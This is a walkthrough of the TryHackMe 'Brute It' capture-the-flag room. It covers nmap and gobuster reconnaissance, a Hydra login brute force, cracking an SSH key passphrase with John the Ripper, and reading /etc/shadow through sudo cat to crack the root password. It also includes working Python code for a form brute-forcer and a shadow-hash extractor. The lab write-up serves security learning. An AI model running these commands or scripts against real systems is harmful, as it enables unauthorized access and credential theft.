TryHackMe: Brute It Walkthrough
--
Task [1]: About this box
Task [2]: Reconnaissance
To gather information about open ports, perform an nmap scan (-sS for a SYN scan, -sV for service version detection, -Pn to skip host discovery). I used the command: nmap -sSV -Pn MACHINE_IP
To search for directories, the tool gobuster is used. I used the command: gobuster dir -u http://MACHINE_IP --wordlist /usr/share/wordlists/dirb/common.txt
Task [3]: Getting a shell
Start with the admin page. It is a simple login page.
Looking at the page source, we find an HTML comment addressed to user John stating that the username is admin.
We can use the well-known password cracking tool Hydra to brute-force the password for the username admin. The F= condition is the text the page prints on a failed login, so Hydra reports any response that does not contain it as a hit. Command used: hydra -l admin -P rockyou.txt MACHINE_IP http-post-form "/admin/index.php:user=^USER^&pass=^PASS^:F=Username or password invalid" -V
After a few attempts we get the password, which is the answer to question 1.
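To make the failure-string logic of that Hydra run concrete, here is an added example (my own code, not part of the original walkthrough or the room) that does the same http-post-form attack in plain Python: it POSTs user=...&pass=... for each candidate and treats the absence of the failure string as success. Because the real box is not reachable offline, the script brings up a constructed stand-in login page on loopback; the demo credentials and the tiny wordlist are made up and are not the room's answers.

```python
import threading
import urllib.error
import urllib.parse
import urllib.request
from http.server import BaseHTTPRequestHandler, HTTPServer

# Constructed stand-in for the room's /admin/index.php so the script runs offline.
# The credentials below are made up for this demo, not the room's answer.
DEMO_USER = "admin"
DEMO_PASS = "hunter2"
FAILURE_STRING = "Username or password invalid"   # the string given to hydra's F= condition


class DemoLoginHandler(BaseHTTPRequestHandler):
    """Answers like the admin login page: HTTP 200 plus the failure string unless the creds match."""

    def do_POST(self):
        length = int(self.headers.get("Content-Length", "0"))
        fields = urllib.parse.parse_qs(self.rfile.read(length).decode())
        user = fields.get("user", [""])[0]
        password = fields.get("pass", [""])[0]
        if user == DEMO_USER and password == DEMO_PASS:
            body = b"<h1>Welcome to the admin panel</h1>"
        else:
            body = b"<p>Username or password invalid</p>"
        self.send_response(200)
        self.send_header("Content-Type", "text/html")
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def log_message(self, *args):
        pass  # keep the demo server quiet


def start_demo_server():
    """Start the fake login page on a random loopback port; returns (server, login_url)."""
    server = HTTPServer(("127.0.0.1", 0), DemoLoginHandler)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return server, f"http://127.0.0.1:{server.server_address[1]}/admin/index.php"


def try_login(url, username, password, failure_string):
    """One POST with user=...&pass=...; success means the failure string is absent from the body."""
    data = urllib.parse.urlencode({"user": username, "pass": password}).encode()
    req = urllib.request.Request(url, data=data, method="POST")
    try:
        with urllib.request.urlopen(req, timeout=5) as resp:
            body = resp.read().decode(errors="replace")
    except urllib.error.HTTPError as err:
        body = err.read().decode(errors="replace")  # error pages are inspected too, like hydra does
    return failure_string not in body


def brute_force(url, username, wordlist, failure_string):
    """Try each candidate in order; returns (password, attempts) or (None, attempts) if none worked."""
    for attempt, candidate in enumerate(wordlist, start=1):
        if try_login(url, username, candidate, failure_string):
            return candidate, attempt
    return None, len(wordlist)


if __name__ == "__main__":
    server, url = start_demo_server()
    # Constructed mini wordlist standing in for rockyou.txt.
    found, attempts = brute_force(url, "admin", ["123456", "password", "hunter2", "letmein"], FAILURE_STRING)
    print(f"password={found!r} after {attempts} attempts")
    server.shutdown()
```

The caveat this makes visible: a "success" is only the absence of one string, so a lockout page, a rate-limit message or a 500 error would all be reported as a valid password. Always confirm a Hydra hit by logging in manually before moving on.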
After successfully logging in we get an RSA private key and the answer to question 4.
The following screenshot shows the RSA key:
Using the command: wget http://MACHINE_IP/admin/panel/id_rsa we can download the RSA key to our local system.
ssh2john.py converts the encrypted private key into a hash format that John the Ripper can crack. The command used is: /usr/share/john/ssh2john.py id_rsa > idrsa.txt
Using John the Ripper we can brute-force the key's passphrase with the wordlist rockyou.txt.
Command used: john idrsa.txt --wordlist=rockyou.txt This gives us the RSA private key passphrase.
During information gathering we saw that port 22 is open and an SSH service is running. Using the RSA key and the passphrase we can try connecting to the SSH server. First restrict the key's permissions with chmod 600 id_rsa, otherwise ssh refuses to use it.
Command used: ssh john@MACHINE_IP -i id_rsa (enter the passphrase recovered by john when prompted)
We get an SSH shell as user john. Take the user flag.
Task [4]: Privilege Escalation
Using sudo -l we can check the user's sudo privileges. We find that user john can run the command /bin/cat as root.
Checking GTFOBins for whether /bin/cat can be abused: yes, it can be used to read any file as root.
Following the steps given on GTFOBins, sudo /bin/cat /etc/shadow gives us /etc/shadow, which contains the system users and their password hashes.
Make a file named 'hashes' and copy the contents of the shadow file into it (the root line is the one we care about). Using john to crack the hashes with rockyou.txt, we get the password of root.
Command used: john hashes --wordlist=rockyou.txt
Use the su command to switch to the root user. And yesssss... we are root now. Get the root flag.
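Rather than pasting the whole shadow file into 'hashes', it helps to know which lines john can actually work on. The following is an added example (my own code, not from the walkthrough or the room) that parses /etc/shadow-format lines, identifies the hash algorithm from the crypt(5) prefix, drops locked and passwordless accounts, and writes the remaining user:hash lines in the form john accepts. The sample shadow lines are constructed: the hash strings are placeholders of the right shape, not real hashes, and the salts and dates are made up.

```python
from dataclasses import dataclass
from typing import List, Optional

# crypt(5) hash prefixes as they appear in the second field of /etc/shadow.
HASH_IDS = {
    "$1$": "md5crypt",
    "$2a$": "bcrypt", "$2b$": "bcrypt", "$2y$": "bcrypt",
    "$5$": "sha256crypt",
    "$6$": "sha512crypt",
    "$y$": "yescrypt",
}

# Constructed sample in /etc/shadow layout. The hash strings are made-up placeholders
# (right shape, not real hashes of any password) and this is not the room's shadow file.
SAMPLE_SHADOW = [
    "root:$6$u7fXzQ1p$" + "A" * 86 + ":18884:0:99999:7:::",
    "daemon:*:18474:0:99999:7:::",
    "sshd:*:18474:0:99999:7:::",
    "john:$6$Rp3lK9sz$" + "B" * 86 + ":18884:0:99999:7:::",
    "nobody:!:18474:0:99999:7:::",
]


@dataclass
class ShadowEntry:
    user: str
    hash: str
    algorithm: Optional[str]   # None when the field holds no recognisable hash
    locked: bool


def parse_shadow_line(line: str) -> ShadowEntry:
    """Split one shadow line (9 colon-separated fields); '!' prefix or '*' means locked."""
    fields = line.rstrip("\n").split(":")
    if len(fields) < 9:
        raise ValueError(f"not a shadow line: {line!r}")
    user, field = fields[0], fields[1]
    locked = field.startswith("!") or field == "*"
    hash_ = field.lstrip("!")   # '!$6$...' is a locked account that still carries a hash
    algorithm = next((name for prefix, name in HASH_IDS.items() if hash_.startswith(prefix)), None)
    return ShadowEntry(user, hash_, algorithm, locked)


def crackable_entries(lines: List[str]) -> List[ShadowEntry]:
    """Keep only accounts with a real, unlocked hash worth feeding to john."""
    kept = []
    for line in lines:
        if not line.strip() or line.startswith("#"):
            continue
        entry = parse_shadow_line(line)
        if entry.locked or entry.algorithm is None:
            continue
        kept.append(entry)
    return kept


def john_hash_file(lines: List[str]) -> str:
    """Text for a 'hashes' file in the user:hash form that john accepts."""
    return "".join(f"{e.user}:{e.hash}\n" for e in crackable_entries(lines))


if __name__ == "__main__":
    for e in crackable_entries(SAMPLE_SHADOW):
        print(f"{e.user}: {e.algorithm}")
    with open("hashes", "w") as fh:
        fh.write(john_hash_file(SAMPLE_SHADOW))
```

With the algorithm known you can pin john's format instead of relying on autodetection, for example john --format=sha512crypt hashes --wordlist=rockyou.txt. On the box the root hash falls to rockyou.txt only because the password is in the wordlist; a yescrypt ($y$) hash on a newer Ubuntu would be much slower to attack and needs a john build that supports it.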
Successfully completed the room :-)
Thank you!!!